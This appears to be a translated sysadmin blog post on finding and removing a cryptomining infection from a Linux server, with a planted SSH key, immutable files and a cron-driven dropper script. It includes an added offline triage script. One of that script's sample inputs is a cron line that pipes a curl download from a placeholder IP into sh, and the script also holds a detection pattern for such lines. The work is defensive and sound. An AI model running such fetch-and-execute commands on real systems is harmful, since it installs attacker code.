1. Recently, some people reported that the web page would not open, so I logged into the server and ran the top command to have a look. We can see that a process with PID 6783 is consuming a lot of CPU. We run the following command to find the executable behind that process number. Once we see what it is, we know it is a mining virus. Here we kill it, and then we slowly unmask the rest. Execute the following command
Take another look at top.
It doesn’t seem to have worked. Let’s try deleting the file.
Permission denied. But I am root; how can root not have permission? There is only one explanation: the file is locked, so here we unlock it. The tool for that comes with e2fsprogs:
yum -y install e2fsprogs
Then look at top again.
The process still exists. Then look at the corresponding executable: the listing shows it as deleted, yet it is still running, so there is a daemon running in the background. And here we see an abnormal.sh.
So let’s download it and open it with Notepad++.
Look at what I’ve highlighted in red; that’s interesting. First, it sets up passwordless login by writing a key into /root/.ssh. Then it uses wget and curl to download these files.
Let’s go online and locate this IP: it turns out to be a German, foreign site. Ping the domain name on the server.
The resolved IP is the same, which means it is the same address. The awkward part is that the suffix is .de, so whois gets us nowhere, and Wanwang does not support lookups for this domain either. We are going to have to start from the IP.
So here we see port 80 is open and 443 is not. That is, HTTP is supported but not HTTPS. Looking at port 22, that turns out to be closed as well. This code is executed every 30 seconds. Here is the script, and here is the public key for the passwordless login.
It grants permissions to these files and makes them unmodifiable. Let’s undo all of that, delete the files, and look at top again.
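The checks walked through above (a running process whose binary was deleted, files locked so root cannot remove them, a cron entry that re-downloads the dropper, and a planted SSH key), as an added offline triage helper. This is not the post's own command sequence; every input is a constructed sample, the IP is a documentation placeholder, and the file and key names are made up.

```shell
#!/bin/sh
# Added triage helper, not the commands from the original post. Every input is
# a constructed sample so the script runs offline; on a live host feed the
# functions the real output of ls -l /proc/*/exe, lsattr, crontab -l and
# the contents of /root/.ssh/authorized_keys.
# Constructed: ls -l on /proc/PID/exe links. A "(deleted)" suffix means the
# binary on disk was removed but the process is still running from memory.
SAMPLE_EXE='lrwxrwxrwx 1 root root 0 Jan  1 10:00 /proc/6783/exe -> /tmp/constructed_miner (deleted)
lrwxrwxrwx 1 root root 0 Jan  1 10:00 /proc/1/exe -> /usr/lib/systemd/systemd'
# Constructed: lsattr output. An "i" in the flag field is the immutable bit,
# which makes rm fail with "Operation not permitted" even for root.
SAMPLE_LSATTR='----i---------e---- /etc/crontab
------------------- /etc/hosts
----i---------e---- /root/.ssh/authorized_keys'
# Constructed: crontab lines. The second one re-downloads and runs a script
# from a placeholder documentation IP, which is how the dropper keeps returning.
SAMPLE_CRON='0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * curl -fsSL http://203.0.113.10/abnormal.sh | sh'
# Constructed: authorized_keys with one known admin key and one planted key.
SAMPLE_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey admin@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExampleUnknownKey root@unknown'

# Print /proc paths of processes whose executable has been deleted.
find_deleted_exe() {
    printf '%s\n' "$1" | awk '/\(deleted\)$/ { print $9 }'
}
# Print files carrying the immutable attribute (candidates for chattr -i).
find_immutable() {
    printf '%s\n' "$1" | awk '$1 ~ /i/ { print $2 }'
}
# Print cron entries that pipe a curl/wget download straight into a shell.
find_cron_downloads() {
    printf '%s\n' "$1" | grep -E '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)'
}
# Print the comment of every authorized key whose key material is not in the
# allow-list passed as the second argument (one key blob per line).
find_unknown_keys() {
    printf '%s\n' "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, "\n"); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        !($2 in ok) { print $3 }'
}

# Stand-alone run over the constructed samples.
find_deleted_exe "$SAMPLE_EXE"
find_immutable "$SAMPLE_LSATTR"
find_cron_downloads "$SAMPLE_CRON"
find_unknown_keys "$SAMPLE_KEYS" "AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey"
```

Anything the functions print is a lead to confirm by hand; a hit on the immutable check in particular explains why the earlier rm failed for root.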
To sum up: you must set a password when you set up Redis. Remember, remember, remember.